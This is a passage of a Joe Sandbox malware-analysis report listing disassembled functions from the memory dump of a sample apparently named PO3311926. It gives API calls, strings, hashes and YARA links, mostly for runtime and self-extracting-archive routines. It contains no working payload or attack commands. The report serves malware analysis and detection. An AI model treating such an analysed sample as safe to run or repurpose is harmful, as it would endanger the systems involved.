_free.LIBCMT ref: 00BCC95C
_free.LIBCMT ref: 00BCC967
_free.LIBCMT ref: 00BCC972
_free.LIBCMT ref: 00BCC97D

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 9d486d0f5b41738b579729d47c04b0f1907a91bc102fe6fcb7ffed4c3619bb06
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 0A110A71580B04AAE621BBB1DC07FDB7BFCAF24B00F804C6DF2DEA6092DA65A5058750

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00BBE669,00BBE5CC,00BBE86D), ref: 00BBE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00BBE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00BBE630

Strings

ReleaseSRWLockExclusive, xrefs: 00BBE625
AcquireSRWLockExclusive, xrefs: 00BBE615
KERNEL32.DLL, xrefs: 00BBE600

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: a8e5bee8c9be4193a1115a838a8c81d78c9c5225683e5d5e2819db05b76b2535
Instruction ID: 51950023a947c6373e20b6d0fd5dd755e4cc992fa74c40e0f44eea2b2b4d094f
Opcode Fuzzy Hash: a8e5bee8c9be4193a1115a838a8c81d78c9c5225683e5d5e2819db05b76b2535
Instruction Fuzzy Hash: C8F0C2317912225B5F224F649C947FAB3C8AE3574531904FAED23D3270FB90CC50AA91

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BC891E

Part of subcall function 00BC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?), ref: 00BC8DE2
Part of subcall function 00BC8DCC: GetLastError.KERNEL32(?,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?,?), ref: 00BC8DF4

_free.LIBCMT ref: 00BC8930
_free.LIBCMT ref: 00BC8943
_free.LIBCMT ref: 00BC8954
_free.LIBCMT ref: 00BC8965

Strings

0"V, xrefs: 00BC8900, 00BC890F, 00BC8924

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 0"V
API String ID: 776569668-4270886499
Opcode ID: baac62cfd3ef62ec0a06feb41f2eeaa74acde637ef5515d1fd784468449002ce
Instruction ID: 5319d94c445ae84746b2b9c2097b933a4497d2e8cbac7bbdb3b6e72cccdf84ee
Opcode Fuzzy Hash: baac62cfd3ef62ec0a06feb41f2eeaa74acde637ef5515d1fd784468449002ce
Instruction Fuzzy Hash: D2F03A758121228BCA467F18FC06B0D7BE1F72472030305AEF0655B2B1DF728941DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00BB146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB14C2

Part of subcall function 00BAB146: GetVersionExW.KERNEL32(?), ref: 00BAB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BB14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BB1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00BB1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB1533

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 572629b26729f5acd6adf267b75285b72339a413b75c08c3b0e75f4ed923bca2
Instruction ID: 6439a4b58fde64ff9595d9123ee9af9019be653b17bc9fe1b727744ea06d0f23
Opcode Fuzzy Hash: 572629b26729f5acd6adf267b75285b72339a413b75c08c3b0e75f4ed923bca2
Instruction Fuzzy Hash: B931F875108306ABC704DFA8C89599BB7F8FF98714F404A2EF999D3210E730D509CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BC2AF1,00BC02FC,00BBFA34), ref: 00BC2B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BC2B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC2B2F
SetLastError.KERNEL32(00000000,00BC2AF1,00BC02FC,00BBFA34), ref: 00BC2B81

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f948567346abfb98ecf7205d813f21836d769a6e31ed02a37a23b73212c5e631
Instruction ID: d976b7b80473f375e9f43db84d56c373ec51d8450b238c4cf2ba4f3d35e8b242
Opcode Fuzzy Hash: f948567346abfb98ecf7205d813f21836d769a6e31ed02a37a23b73212c5e631
Instruction Fuzzy Hash: BF01D43210A712AEE6542B747C95F2A6BD9EB01F747A047BEF1245A0E1FF118C009254

Uniqueness

Uniqueness Score: -1.00%

Function 00BC97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00BE1098,00BC4674,00BE1098,?,?,00BC40EF,?,?,00BE1098), ref: 00BC97E9
_free.LIBCMT ref: 00BC981C
_free.LIBCMT ref: 00BC9844
SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC9851
SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC985D
_abort.LIBCMT ref: 00BC9863

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: c832522fcfa827e638db54d4cb073594dd29f906122c4957e827083841a67f0d
Instruction ID: 9fed498fb4b6d15d9c02f975efae21de5edbabd3b35c9eb27e07a1dd1296901b
Opcode Fuzzy Hash: c832522fcfa827e638db54d4cb073594dd29f906122c4957e827083841a67f0d
Instruction Fuzzy Hash: 99F0A43614160166E6523324BC6EF1B1BE5DFD2BB1F3501BDF525A71D2FE20CC018665

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BBDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBDC72
TranslateMessage.USER32(?), ref: 00BBDC7C
DispatchMessageW.USER32(?), ref: 00BBDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BBDC91

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: b9804b4e6a0f3b260673858df70302aed0069321a75dab89e15b3bac6ee0cb3c
Instruction ID: 78a12144b745fffa4e13cb91ee93bb530f315df3bce6f2b8c1d9f8103f0c3ff6
Opcode Fuzzy Hash: b9804b4e6a0f3b260673858df70302aed0069321a75dab89e15b3bac6ee0cb3c
Instruction Fuzzy Hash: 56F03C72A02219BBCB216BA5DC4CFDFBFADEF41795B004011B50AE2051E6798646CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BAC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00BB05DA: _wcslen.LIBCMT ref: 00BB05E0

Part of subcall function 00BAB92D: _wcsrchr.LIBVCRUNTIME ref: 00BAB944

_wcslen.LIBCMT ref: 00BAC197
_wcslen.LIBCMT ref: 00BAC1DF

Strings

.rar, xrefs: 00BAC0E1, 00BAC134
.exe, xrefs: 00BAC10B
.sfx, xrefs: 00BAC11A

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 01652379f058de3e19146f10f89ed5c1e6be2bf02e21aaba18bbd4cd1f718565
Instruction ID: 0b045736a7b87cd6ff0e963b6642c0bd2732e6e710cbe882fd5357562d0aba9a
Opcode Fuzzy Hash: 01652379f058de3e19146f10f89ed5c1e6be2bf02e21aaba18bbd4cd1f718565
Instruction Fuzzy Hash: 1A412A2564831196C732AF748852E7BBBF4EF43B44F1449CEF9966B182FB904D85C391

Uniqueness

Uniqueness Score: -1.00%

Function 00BABB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BABB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00BAA275,?,?,00000800,?,00BAA23A,?,00BA755C), ref: 00BABBC5
_wcslen.LIBCMT ref: 00BABC3B

Strings

UNC, xrefs: 00BABBA7
\\?\, xrefs: 00BABB52, 00BABB99, 00BABBF7, 00BABC4E

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 083d1341d56deab590882e2048c7034f7447a2576eabfb7bfea8119d6da22a3d
Instruction ID: e89c0ffceaa6183a7b8bfe5bcff9677875db6bfa8b885ccbf296be9484639b7f
Opcode Fuzzy Hash: 083d1341d56deab590882e2048c7034f7447a2576eabfb7bfea8119d6da22a3d
Instruction Fuzzy Hash: FE416231444215BACB21AF60CC45EFF7BE9EF467A0F1045E6F965A3153FBB0DA908A60

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00BBB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00BBB712
DeleteObject.GDI32(00000000), ref: 00BBB744
DeleteObject.GDI32(00000000), ref: 00BBB767

Part of subcall function 00BBA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BBB73D,00000066), ref: 00BBA6D5
Part of subcall function 00BBA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA6EC
Part of subcall function 00BBA6C2: LoadResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA703
Part of subcall function 00BBA6C2: LockResource.KERNEL32(00000000,?,?,?,00BBB73D,00000066), ref: 00BBA712
Part of subcall function 00BBA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BBB73D,00000066), ref: 00BBA72D
Part of subcall function 00BBA6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00BBB73D,00000066), ref: 00BBA73E
Part of subcall function 00BBA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BBA7A7
Part of subcall function 00BBA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00BBA7C6
Part of subcall function 00BBA6C2: GlobalFree.KERNEL32(00000000), ref: 00BBA7CD

Strings

], xrefs: 00BBB71A

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: d9564c826ae7f8d967ceac652abcecf3245aa368bc282e5302f884e47ef05022
Instruction ID: 5713d809ba25806e04cdd360cca54e7b03219e177a1c365ec87e8512d652c941
Opcode Fuzzy Hash: d9564c826ae7f8d967ceac652abcecf3245aa368bc282e5302f884e47ef05022
Instruction Fuzzy Hash: B601AD369002016BC72267799C49FFF7AFAAFC0B56F190091B900A7291EFE18D0582A1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370

EndDialog.USER32(?,00000001), ref: 00BBD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00BBD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00BBD675
SetDlgItemTextW.USER32(?,00000068), ref: 00BBD684

Strings

RENAMEDLG, xrefs: 00BBD618

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 41edabf13cbd1f0af5f0c6d3b44be31e53aa596c9cd9f2dd84bc23fe406aa9c4
Instruction ID: 1eea9ac0aea701906623a5d32e210a072db1c1895ea0f6781ebcfee5ab8d4691
Opcode Fuzzy Hash: 41edabf13cbd1f0af5f0c6d3b44be31e53aa596c9cd9f2dd84bc23fe406aa9c4
Instruction Fuzzy Hash: 0201F133285214BBD2204F689D49FBB7BDCEB9AB01F020452F306A2090DAE69904CB79

Uniqueness

Uniqueness Score: -1.00%

Function 00BC7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BC7E24,?,?,00BC7DC4,?,00BDC300,0000000C,00BC7F1B,?,00000002), ref: 00BC7E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BC7EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00BC7E24,?,?,00BC7DC4,?,00BDC300,0000000C,00BC7F1B,?,00000002,00000000), ref: 00BC7EC9

Strings

mscoree.dll, xrefs: 00BC7E8C
CorExitProcess, xrefs: 00BC7E9E

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a3f82c6c0a02b81b319058ee9982c2afc2275f4a97f5e86cdb2d0f0c984827da
Instruction ID: c2ccf2f9c4d35353609c96e3a5b080fa7fb9778e54bd0150ac87ccd1409ea632
Opcode Fuzzy Hash: a3f82c6c0a02b81b319058ee9982c2afc2275f4a97f5e86cdb2d0f0c984827da
Instruction Fuzzy Hash: 1AF03135941209BBCB119BA0DC19BAEFFF8EB44711F0040EAE805A3261EF709E40CA95

Uniqueness

Uniqueness Score: -1.00%

Function 00BAF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BB0836
Part of subcall function 00BB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAF2D8,Crypt32.dll,00000000,00BAF35C,?,?,00BAF33E,?,?,?), ref: 00BB0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BAF2E4
GetProcAddress.KERNEL32(00BE81C8,CryptUnprotectMemory), ref: 00BAF2F4

Strings

CryptUnprotectMemory, xrefs: 00BAF2EA
Crypt32.dll, xrefs: 00BAF2CE
CryptProtectMemory, xrefs: 00BAF2DE

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: aafa88250a66a42e15a5b22d79cf1f72aee9f825bfc9e849ba26ef9991dee0dd
Instruction ID: ac47e26c9fe55e51c75d283c5e88b7c7b18b2f58dc23a8658c175f1eebe03da1
Opcode Fuzzy Hash: aafa88250a66a42e15a5b22d79cf1f72aee9f825bfc9e849ba26ef9991dee0dd
Instruction Fuzzy Hash: 29E02674A10702AECB209F74981CB56FBD4AF04F00F04C8AFF0CA93362EAB0D1408B21

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00BC2CA1
___AdjustPointer.LIBCMT ref: 00BC2CC4
_abort.LIBCMT ref: 00BC2D12
___AdjustPointer.LIBCMT ref: 00BC2D60

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: ed09156325c388f4c54cfc756321cdcd686bced47ffced61561f2ff7a8561960
Instruction ID: 9cdc9c729f5fee7e49f223c312a2acd4c4c81cc15e2a05b8c23c8b6d88156225
Opcode Fuzzy Hash: ed09156325c388f4c54cfc756321cdcd686bced47ffced61561f2ff7a8561960
Instruction Fuzzy Hash: A451B071600216AFDB299F18D885FBAB7E4FF64710F2445ADEC02476A1E731ED40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00BCBF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BCBF5C

Part of subcall function 00BC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC4286,?,0000015D,?,?,?,?,00BC5762,000000FF,00000000,?,?), ref: 00BC8E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BCBF82
_free.LIBCMT ref: 00BCBF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BCBFA4

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
